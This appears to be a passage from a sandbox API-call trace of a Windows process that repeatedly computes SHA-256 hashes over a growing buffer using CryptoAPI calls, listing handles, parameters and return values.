	[0239.607] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.607] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.607] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0239.607] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0a30
	[0239.607] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0a30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0a30, pdwDataLen=0x128ba4) returned 1
	[0239.607] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.607] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.607] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.608] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.608] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0239.608] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0a58
	[0239.608] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0a58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0a58, pdwDataLen=0x128ba4) returned 1
	[0239.608] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.608] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.608] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.608] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.608] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0239.608] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0a80
	[0239.608] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0a80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0a80, pdwDataLen=0x128ba4) returned 1
	[0239.608] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.608] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.608] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.609] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.609] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0239.609] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.609] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0aa8
	[0239.609] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0aa8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0aa8, pdwDataLen=0x128ba4) returned 1
	[0239.609] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.609] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.609] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.609] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.609] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0239.609] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.609] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0ad0
	[0239.609] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0ad0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0ad0, pdwDataLen=0x128ba4) returned 1
	[0239.609] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.609] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.609] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.610] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.610] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0239.610] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0af8
	[0239.610] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0af8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0af8, pdwDataLen=0x128ba4) returned 1
	[0239.610] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.610] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.610] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.610] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.610] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0239.611] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0b20
	[0239.611] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0b20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0b20, pdwDataLen=0x128ba4) returned 1
	[0239.611] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.611] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.611] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.611] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.611] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0239.611] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0b48
	[0239.611] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0b48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0b48, pdwDataLen=0x128ba4) returned 1
	[0239.611] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.611] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.611] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.612] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.612] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0239.612] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0b70
	[0239.612] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0b70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0b70, pdwDataLen=0x128ba4) returned 1
	[0239.612] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.612] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.612] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.612] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.612] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0239.612] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0b98
	[0239.612] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0b98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0b98, pdwDataLen=0x128ba4) returned 1
	[0239.612] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.612] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.612] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.613] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.613] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0239.613] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0bc0
	[0239.613] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0bc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0bc0, pdwDataLen=0x128ba4) returned 1
	[0239.613] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.613] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.613] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.613] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.613] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0239.613] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0be8
	[0239.613] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0be8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0be8, pdwDataLen=0x128ba4) returned 1
	[0239.614] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.614] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.614] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.614] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.614] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0239.614] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0c10
	[0239.614] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0c10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0c10, pdwDataLen=0x128ba4) returned 1
	[0239.614] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.614] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.614] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.615] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.615] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0239.615] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0c38
	[0239.615] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0c38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0c38, pdwDataLen=0x128ba4) returned 1
	[0239.615] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.615] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.615] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.615] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.615] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0239.615] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0c60
	[0239.615] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0c60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0c60, pdwDataLen=0x128ba4) returned 1
	[0239.615] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.615] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.615] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.616] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.616] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0239.616] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0c88
	[0239.616] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0c88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0c88, pdwDataLen=0x128ba4) returned 1
	[0239.616] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.616] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.616] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.617] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.617] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0239.617] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0cb0
	[0239.617] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0cb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0cb0, pdwDataLen=0x128ba4) returned 1
	[0239.617] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.617] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.617] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.618] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.618] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0239.618] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0cd8
	[0239.618] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0cd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0cd8, pdwDataLen=0x128ba4) returned 1
	[0239.618] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.618] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.618] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.618] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.618] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0239.618] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0d00
	[0239.618] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0d00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0d00, pdwDataLen=0x128ba4) returned 1
	[0239.618] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.618] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.618] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.619] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.619] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0239.619] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.619] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0d28
	[0239.619] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0d28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0d28, pdwDataLen=0x128ba4) returned 1
	[0239.619] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.619] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.619] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.619] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.619] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0239.620] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0d50
	[0239.620] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0d50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0d50, pdwDataLen=0x128ba4) returned 1
	[0239.620] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.620] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.620] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.620] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.620] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0239.620] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0d78
	[0239.620] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0d78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0d78, pdwDataLen=0x128ba4) returned 1
	[0239.620] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.620] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.620] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.621] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.621] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0239.621] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0da0
	[0239.621] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0da0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0da0, pdwDataLen=0x128ba4) returned 1
	[0239.621] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.621] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.621] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.621] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.621] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0239.621] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0dc8
	[0239.621] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c0dc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0dc8, pdwDataLen=0x128ba4) returned 1
	[0239.621] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.621] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.621] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.622] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.622] CryptHashData (hHash=0x22b6f00, pbData=0x2892008, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0239.622] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0df0
	[0239.622] CryptGetHashParam (in: hHash=0x22b6f00, dwParam=0x2, pbData=0x27c0df0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c0df0, pdwDataLen=0x128ba4) returned 1
	[0239.622] CryptDestroyHash (hHash=0x22b6f00) returned 1
	[0239.622] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
